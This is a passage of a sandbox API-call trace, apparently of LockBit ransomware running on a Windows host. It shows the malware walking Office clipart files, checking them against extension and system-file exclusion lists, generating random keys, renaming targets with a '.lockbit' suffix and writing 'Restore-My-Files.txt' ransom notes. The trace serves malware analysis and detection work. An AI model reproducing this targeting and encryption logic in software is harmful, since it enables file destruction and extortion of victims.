hTemplateFile=0x0) returned 0xffffffff [0102.289] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1fda300, ftCreationTime.dwHighDateTime=0x1bd4b21, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa1fda300, ftLastWriteTime.dwHighDateTime=0x1bd4b21, nFileSizeHigh=0x0, nFileSizeLow=0x1f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN01060_.WMF", cAlternateFileName="")) returned 1 [0102.289] lstrcmpiW (lpString1=".", lpString2="AN01060_.WMF") returned -1 [0102.289] lstrcmpiW (lpString1="..", lpString2="AN01060_.WMF") returned -1 [0102.289] PathFindExtensionW (pszPath="AN01060_.WMF") returned=".WMF" [0102.289] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.289] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.289] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.289] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.289] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.289] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.289] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.289] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.289] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.289] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.289] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.289] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.289] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.290] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.290] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.291] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.291] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.291] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.291] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.291] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.291] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.291] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.291] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN01060_.WMF") returned 1 [0102.291] lstrcmpiW (lpString1="ntldr", lpString2="AN01060_.WMF") returned 1 [0102.291] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN01060_.WMF") returned 1 [0102.291] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN01060_.WMF") returned 1 [0102.291] lstrcmpiW (lpString1="autorun.inf", lpString2="AN01060_.WMF") returned 1 [0102.291] lstrcmpiW (lpString1="thumbs.db", lpString2="AN01060_.WMF") returned 1 [0102.291] lstrcmpiW (lpString1="iconcache.db", lpString2="AN01060_.WMF") returned 1 [0102.291] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.291] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned=".WMF" [0102.291] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.291] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.291] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.291] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.291] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.291] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.291] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.291] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.292] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.292] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.lockbit") returned 72 [0102.292] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf00 [0102.294] CreateIoCompletionPort (FileHandle=0xf00, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.294] malloc (_Size=0x40068) returned 0x1ff1e60 [0102.294] GetFileSizeEx (in: hFile=0xf00, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7968) returned 1 [0102.294] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.295] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.295] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0102.295] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.296] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0102.296] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0102.301] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.305] malloc (_Size=0xa6) returned 0x3df0008 [0102.305] NtSetInformationFile (FileHandle=0xf00, IoStatusBlock=0x3d6b6b4, FileInformation=0x3df0008, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0102.305] free (_Block=0x3df0008) [0102.305] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.305] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.305] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.305] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86dd6400, ftCreationTime.dwHighDateTime=0x1bd4b1e, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x86dd6400, ftLastWriteTime.dwHighDateTime=0x1bd4b1e, nFileSizeHigh=0x0, nFileSizeLow=0x728, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN01084_.WMF", cAlternateFileName="")) returned 1 [0102.305] lstrcmpiW (lpString1=".", lpString2="AN01084_.WMF") returned -1 [0102.305] lstrcmpiW (lpString1="..", lpString2="AN01084_.WMF") returned -1 [0102.305] PathFindExtensionW (pszPath="AN01084_.WMF") returned=".WMF" [0102.305] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.305] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.305] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.305] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.305] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.305] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.305] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.305] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.306] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.306] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.307] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.307] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.307] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.307] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.307] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.307] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.307] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.307] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.307] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.307] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.307] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.307] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.307] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.307] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN01084_.WMF") returned 1 [0102.307] lstrcmpiW (lpString1="ntldr", lpString2="AN01084_.WMF") returned 1 [0102.307] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN01084_.WMF") returned 1 [0102.307] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN01084_.WMF") returned 1 [0102.307] lstrcmpiW (lpString1="autorun.inf", lpString2="AN01084_.WMF") returned 1 [0102.307] lstrcmpiW (lpString1="thumbs.db", lpString2="AN01084_.WMF") returned 1 [0102.307] lstrcmpiW (lpString1="iconcache.db", lpString2="AN01084_.WMF") returned 1 [0102.307] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.307] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned=".WMF" [0102.307] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.307] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.307] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.307] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.308] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.308] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.lockbit") returned 72 [0102.308] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf00 [0102.309] CreateIoCompletionPort (FileHandle=0xf00, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.309] malloc (_Size=0x40068) returned 0x1ff1e60 [0102.309] GetFileSizeEx (in: hFile=0xf00, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1832) returned 1 [0102.309] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.310] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0102.310] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.311] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0102.311] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0102.318] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.318] malloc (_Size=0xa6) returned 0x3df0008 [0102.319] NtSetInformationFile (FileHandle=0xf00, IoStatusBlock=0x3d6b6b4, FileInformation=0x3df0008, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0102.319] free (_Block=0x3df0008) [0102.319] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.319] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.319] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.319] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54406500, ftCreationTime.dwHighDateTime=0x1bd4b38, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54406500, ftLastWriteTime.dwHighDateTime=0x1bd4b38, nFileSizeHigh=0x0, nFileSizeLow=0x66dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN01173_.WMF", cAlternateFileName="")) returned 1 [0102.319] lstrcmpiW (lpString1=".", lpString2="AN01173_.WMF") returned -1 [0102.319] lstrcmpiW (lpString1="..", lpString2="AN01173_.WMF") returned -1 [0102.319] PathFindExtensionW (pszPath="AN01173_.WMF") returned=".WMF" [0102.319] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.319] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.319] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.319] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.319] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.319] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.320] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.321] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.321] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN01173_.WMF") returned 1 [0102.321] lstrcmpiW (lpString1="ntldr", lpString2="AN01173_.WMF") returned 1 [0102.321] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN01173_.WMF") returned 1 [0102.321] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN01173_.WMF") returned 1 [0102.321] lstrcmpiW (lpString1="autorun.inf", lpString2="AN01173_.WMF") returned 1 [0102.321] lstrcmpiW (lpString1="thumbs.db", lpString2="AN01173_.WMF") returned 1 [0102.322] lstrcmpiW (lpString1="iconcache.db", lpString2="AN01173_.WMF") returned 1 [0102.322] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.322] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned=".WMF" [0102.322] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.322] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.322] lstrcmpiW 